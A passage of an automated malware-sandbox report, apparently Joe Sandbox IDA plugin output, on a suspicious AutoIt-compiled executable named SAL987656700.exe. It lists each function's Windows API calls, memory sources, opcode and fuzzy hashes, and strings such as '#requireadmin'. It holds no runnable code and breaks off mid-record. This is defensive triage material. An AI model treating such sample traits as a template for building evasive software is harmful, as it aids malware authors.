                                      • Opcode ID: 6e9c9a862e1a8e598f978f1c990c8ec9c77c31d881a38d28fb8f7e6aac189671
                                      • Instruction ID: 2e7800529742407eb754b01d8f0f1028c9c96caf595f414bef8b146b6b228c6d
                                      • Opcode Fuzzy Hash: 6e9c9a862e1a8e598f978f1c990c8ec9c77c31d881a38d28fb8f7e6aac189671
                                      • Instruction Fuzzy Hash: 26411D72900218BFDB10DBA9CD46ADEBBB8FF0A700F104055FA55B7181DB706E45CBA1
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SAL987656700.exe,00000104), ref: 008B1769
                                      • _free.LIBCMT ref: 008B1834
                                      • _free.LIBCMT ref: 008B183E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\SAL987656700.exe
                                      • API String ID: 2506810119-229385648
                                      • Opcode ID: ec13a0e81c84c12ab6dec53dfd9a2407110248ce2d99e9ef7d9bc5ecbc43845c
                                      • Instruction ID: ddba342ff9c5e9a58590e9856f3e6a5eb6ef518c31694187e4a2741bb905d48e
                                      • Opcode Fuzzy Hash: ec13a0e81c84c12ab6dec53dfd9a2407110248ce2d99e9ef7d9bc5ecbc43845c
                                      • Instruction Fuzzy Hash: 96318E71A44218ABDF21DF999889EDEBBFCFB85310F504166F814DB311DA708E40DB91
                                      APIs
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008EC306
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 008EC34C
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00951990,01045AF0), ref: 008EC395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 53c067321636d91abb4d04e282b46e38aba478ea3c209dc7d5bec7d25492a5f4
                                      • Instruction ID: c83f7f55a2ddd82cd8f5b25d588049ae9d07a0a2962c28545a9f9cd3a2a92fb7
                                      • Opcode Fuzzy Hash: 53c067321636d91abb4d04e282b46e38aba478ea3c209dc7d5bec7d25492a5f4
                                      • Instruction Fuzzy Hash: 41418E71608381AFD720DF2AD844B5BBBA8FB86314F04861DF9A5D73D1D730A905CB62
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0091CC08,00000000,?,?,?,?), ref: 009144AA
                                      • GetWindowLongW.USER32 ref: 009144C7
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009144D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: cfcb732d9b54c019aa6ec4643d50ac387f560d189743552a173bd04cea866852
                                      • Instruction ID: e7fa08f033c213ca666279565c3425ba940e702dcd29e6a72e2116a6adfe790d
                                      • Opcode Fuzzy Hash: cfcb732d9b54c019aa6ec4643d50ac387f560d189743552a173bd04cea866852
                                      • Instruction Fuzzy Hash: 01319A72314609ABDF209E38DC45BEA7BAAEB08334F204725F975A21E0D770AC909B50
                                      APIs
                                        • Part of subcall function 0090335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00903077,?,?), ref: 00903378
                                      • inet_addr.WS2_32(?), ref: 0090307A
                                      • _wcslen.LIBCMT ref: 0090309B
                                      • htons.WS2_32(00000000), ref: 00903106
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 946324512-2422070025
                                      • Opcode ID: b9ad1417c30b82549750ca9918c62ae6c8284324efc1e9f35570b497fcc7faa1
                                      • Instruction ID: 341eeb10eb42ad59b1d1c2935616e05a910f6899a85399c53fa2c8d01054d73d
                                      • Opcode Fuzzy Hash: b9ad1417c30b82549750ca9918c62ae6c8284324efc1e9f35570b497fcc7faa1
                                      • Instruction Fuzzy Hash: 4731B0392042059FCB20CF29C485EAA77F8EF55318F24C499E8158B7D2DB72EE45C761
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00914705
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00914713
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0091471A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: d26e6e718e4e84d429826a7da7729b7b637044370cb23924c22ed6b4215b22a2
                                      • Instruction ID: 06967de18fadb1b7150218a99c32b03b32ea3c023c94bc5594a90f5cedc403da
                                      • Opcode Fuzzy Hash: d26e6e718e4e84d429826a7da7729b7b637044370cb23924c22ed6b4215b22a2
                                      • Instruction Fuzzy Hash: 4A216DB5604209AFEB11DF68DCD1DA737ADEB9A7A8B040059FA00DB291CB70EC51DB61
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 176396367-2734436370
                                      • Opcode ID: 424ff3eb47216a4c87a71b0b0d2230ca33734ef874e03be512d86828111f187a
                                      • Instruction ID: 54b323c02ce2dd1cd3e989ae72c07c12ac2135ca19be156bb4b49930e9c6de24
                                      • Opcode Fuzzy Hash: 424ff3eb47216a4c87a71b0b0d2230ca33734ef874e03be512d86828111f187a
                                      • Instruction Fuzzy Hash: 7B216872204694A6D731BB2A9C02FBB73A8FFA3304F144426F989D7051EBD49D91C3A2
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00913840
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00913850
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00913876
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 079cd0494f7074f991952ef6df0151e1f7d4511d5bd835ac700a053d2c1b0a96
                                      • Instruction ID: 54041c3eef6e7573a72bceec3216abbb8918ca9f38e0eb889a1ce9b059fda8c2
                                      • Opcode Fuzzy Hash: 079cd0494f7074f991952ef6df0151e1f7d4511d5bd835ac700a053d2c1b0a96
                                      • Instruction Fuzzy Hash: E021AC72710218BBEF218F64CC81FEB377EEF89754F108124F9009B190C6719C9287A0
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F4A08
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008F4A5C
                                      • SetErrorMode.KERNEL32(00000000,?,?,0091CC08), ref: 008F4AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: %lu
                                      • API String ID: 2507767853-685833217
                                      • Opcode ID: f404e7866a01586111a108100961975d3f86f74fed7608b48eefe3b4aae7a40e
                                      • Instruction ID: 4ce46871df4c0deb3afe86ea6dd6b2e68cc146c99f006b88ae486232a14cfdd3
                                      • Opcode Fuzzy Hash: f404e7866a01586111a108100961975d3f86f74fed7608b48eefe3b4aae7a40e
                                      • Instruction Fuzzy Hash: A7317175A40109AFDB10DF68C885EAA7BF8FF09308F1480A9F909DB252D771ED45CB62
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0091424F
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00914264
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00914271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 42ea53af47dfa4758ca2f335f185dc7f697e863bf6edcd8d76cb9509986d4aef
                                      • Instruction ID: 3497c9b96093cf58a7e0e76c3de07d008dd0ba0e170a340492d9c9213d0ed3f5
                                      • Opcode Fuzzy Hash: 42ea53af47dfa4758ca2f335f185dc7f697e863bf6edcd8d76cb9509986d4aef
                                      • Instruction Fuzzy Hash: AA11E031340208BEEF205E69CC06FEB3BACEF99B64F110524FA55E20A0D271DCA19B20
                                      APIs
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                        • Part of subcall function 008E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008E2DC5
                                        • Part of subcall function 008E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E2DD6
                                        • Part of subcall function 008E2DA7: GetCurrentThreadId.KERNEL32 ref: 008E2DDD
                                        • Part of subcall function 008E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008E2DE4
                                      • GetFocus.USER32 ref: 008E2F78
                                        • Part of subcall function 008E2DEE: GetParent.USER32(00000000), ref: 008E2DF9
                                      • GetClassNameW.USER32(?,?,00000100), ref: 008E2FC3
                                      • EnumChildWindows.USER32(?,008E303B), ref: 008E2FEB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                      • String ID: %s%d
                                      • API String ID: 1272988791-1110647743
                                      • Opcode ID: ecfcd3bd9d287b4fdff2d6a8b422bfa4a5ab0d27f900efd0af010370e3480990
                                      • Instruction ID: 42512cadde227bf299fcdd307a596deed0a8ea8aa0735b79745aebef581cac3f
                                      • Opcode Fuzzy Hash: ecfcd3bd9d287b4fdff2d6a8b422bfa4a5ab0d27f900efd0af010370e3480990
                                      • Instruction Fuzzy Hash: 8111D2B17002496BCF047F698C89EEE376AFF85318F048075BA09EB252EE309D45CB61
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009158C1
                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009158EE
                                      • DrawMenuBar.USER32(?), ref: 009158FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw
                                      • String ID: 0
                                      • API String ID: 3227129158-4108050209
                                      • Opcode ID: ed0a84493c45647fc9b81492c87c82b500f6946b9fb344ee36c988cf7e1341e0
                                      • Instruction ID: 752353551753424816ec0870401e0967acd0f588ebe7d188091e53d1094f26da
                                      • Opcode Fuzzy Hash: ed0a84493c45647fc9b81492c87c82b500f6946b9fb344ee36c988cf7e1341e0
                                      • Instruction Fuzzy Hash: BD018B31604218EFDB219F11DC44BEEBBB9FB85360F158099F849DA161DB308A80EF22
                                      APIs
                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 008DD3BF
                                      • FreeLibrary.KERNEL32 ref: 008DD3E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: GetSystemWow64DirectoryW$X64
                                      • API String ID: 3013587201-2590602151
                                      • Opcode ID: f134a448645b6c5ad0b9077e295dc32c0e3ee611629af4618825ff8d29164343
                                      • Instruction ID: 6cb9b6e70bf09246b2052eb944dbb8cf5ac5cac172346774cef45d13dd25bf85
                                      • Opcode Fuzzy Hash: f134a448645b6c5ad0b9077e295dc32c0e3ee611629af4618825ff8d29164343
                                      • Instruction Fuzzy Hash: 29F055B1AC9B29ABD73962108C14EAE7320FF00705B58831BE802E6345E720CC858282
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f7e489ef25ec77998d6baa9b1f44921eca80a5f7ccc83227dfb1c153d7121c26
                                      • Instruction ID: 909d21c6ed604434a3eb4070ad4b6a178cb793947cd063a535c99166f679d736
                                      • Opcode Fuzzy Hash: f7e489ef25ec77998d6baa9b1f44921eca80a5f7ccc83227dfb1c153d7121c26
                                      • Instruction Fuzzy Hash: 76C16B75A0024AEFCB15CFA9C894AAEB7B5FF49304F208998E505EB251D771ED81CF90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInitInitializeUninitialize
                                      • String ID:
                                      • API String ID: 1998397398-0
                                      • Opcode ID: 01822a6908543a678f08f191aee6569d0922b63c8015dedbde9d309cfdb7d5f5
                                      • Instruction ID: d0de28f001d3a1b1f1315eca64ff258782ff5a52f7bb37de2d858888b045c02a
                                      • Opcode Fuzzy Hash: 01822a6908543a678f08f191aee6569d0922b63c8015dedbde9d309cfdb7d5f5
                                      • Instruction Fuzzy Hash: 78A12D756047009FCB10EF28C585A2AB7E9FF89714F148859F99ADB3A2DB31ED01CB52
                                      APIs
                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008E05F0
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008E0608
                                      • CLSIDFromProgID.COMBASE(?,?), ref: 008E062D
                                      • _memcmp.LIBVCRUNTIME ref: 008E064E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      • API String ID: 314563124-0
                                      • Opcode ID: ef87a0699638f856cd2c2c7e8c540fdd4372cba31a8040108e943d0874766ae6
                                      • Instruction ID: b142c0a43cd926422dd677fb69ef2233395d8147e232d3fcf6e108e39e7939e2
                                      • Opcode Fuzzy Hash: ef87a0699638f856cd2c2c7e8c540fdd4372cba31a8040108e943d0874766ae6
                                      • Instruction Fuzzy Hash: 1A81E775A00209AFCB04DF94C984EEEB7B9FF89315B204598E516EB250DB71AE46CF60
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 4cf7ed98a3de7da4e458eab374baa6e19688c006998730cc7ab894dca4143261
                                      • Instruction ID: a75d3a3b05225c6caf35589e2dd88bdf76c63300d9d978ef4cd1b3eedd10211b
                                      • Opcode Fuzzy Hash: 4cf7ed98a3de7da4e458eab374baa6e19688c006998730cc7ab894dca4143261
                                      • Instruction Fuzzy Hash: 5F410931600504ABEF296AFC8CC9FAE3AB6FF43370F244629F519D6693E674C8415267
                                      APIs
                                      • GetWindowRect.USER32(01053298,?), ref: 009162E2
                                      • ScreenToClient.USER32(?,?), ref: 00916315
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00916382
                                      Memory Dump Source
